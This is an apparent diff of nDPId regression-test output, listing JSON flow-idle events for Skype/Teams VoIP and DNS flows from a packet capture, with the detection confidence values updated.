-00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.28","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.15","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.27","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.34","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.171","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.159","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970660848,"flow_last_seen":1431970660848,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970679839,"flow_last_seen":1431970706169,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60413,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431970636300,"flow_last_seen":1431970662705,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":50055,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.43","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.19","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.42","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.13","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970682972,"flow_last_seen":1431970682972,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.173","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970670941,"flow_last_seen":1431970670941,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.149","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970660848,"flow_last_seen":1431970660848,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.160","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970664878,"flow_last_seen":1431970664878,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.44","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.170","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970681960,"flow_last_seen":1431970681960,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.40","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.28","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.15","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.27","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.34","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.171","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.159","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970660848,"flow_last_seen":1431970660848,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 